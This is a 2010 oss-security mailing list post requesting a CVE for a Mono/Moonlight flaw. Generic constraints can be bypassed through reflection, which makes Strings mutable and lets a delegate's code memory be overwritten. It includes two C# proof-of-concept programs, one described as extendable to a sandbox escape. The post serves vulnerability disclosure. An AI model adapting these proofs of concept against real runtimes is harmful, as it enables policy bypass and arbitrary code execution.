Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 25 Nov 2010 15:52:17 +0100
From: Thomas Biege <>
Subject: CVE request: mono/moonlight: execution of arbitrary code due to mutable Strings


Just a copy-n-paste from our bugzilla (again):

SP 2010-11-24 20:45:21 UTC

Original (pulled by author) blog entry:

So I was messing around with generic methods and discovered that generic
constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection (with the
exception of the new() constraint). One of the fun results of this bug is that
the String class can be made mutable without using reflection to set private

The following code demonstrates this; it is legal and will run on Mono up to
and including version 2.8:

using System;
using System.Reflection;

public class FakeString {
    public int length;
    public char start_char;

public class TestCase {
    private static FakeString UnsafeConversion<T>(T thing)
        where T : FakeString
        return thing;

    public static void Main() {
        var a = "foo";
        var b = MakeMutable(a);

        b.start_char = 'b';

    private static FakeString MakeMutable(string s)
        var m = typeof(TestCase).GetMethod("UnsafeConversion",
BindingFlags.NonPublic | BindingFlags.Static);
        var m2 = m.MakeGenericMethod(typeof(string));

        var d = (Func<string,
FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null,

        return d(s);

Comment 1 SP 2010-11-24 20:54:20 UTC

This is a follow up of the previous

The original blog entry allow trusted (by moonlight) code to mutate strings
which could be used to trick policies (e.g. give a valid URL and, once 
as a valid xdomain URL, change it to something else).

It can also be extended to arbitrary code execution. POC by Geoff Norton: 

using System;
using System.Reflection;
using System.Runtime.InteropServices;

public class DelegateWrapper {
    public IntPtr method_ptr;

public delegate void MethodWrapper ();

public class BreakSandbox {
    private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
        return dingus;

    private static DelegateWrapper ConvertDelegate (Delegate del) {
        var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
        var gm = m.MakeGenericMethod (typeof (Delegate));

        var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);

        return d (del);

    public static void Main (string [] args) {
        MethodWrapper d = delegate {
            Console.WriteLine ("Hello");

        d ();
        var converted = ConvertDelegate (d);
        // Overwrite the already WX page with a 'ret'
        Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
        d ();

This code won't execute on Moonlight (since all Marshal.* code is
SecurityCritical) but it would not be hard to modify the POC to do the same
without SecurityCritical code.

Note: the bug is present in Mono but does not represent a security
vulnerability there since Mono (unlike Moonlight) can only execute trusted

[reply] [-]
Comment 2 

 Thomas Biege <>, SUSE LINUX, Security Support & Auditing
 SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
  Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
                            -- Marie von Ebner-Eschenbach

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.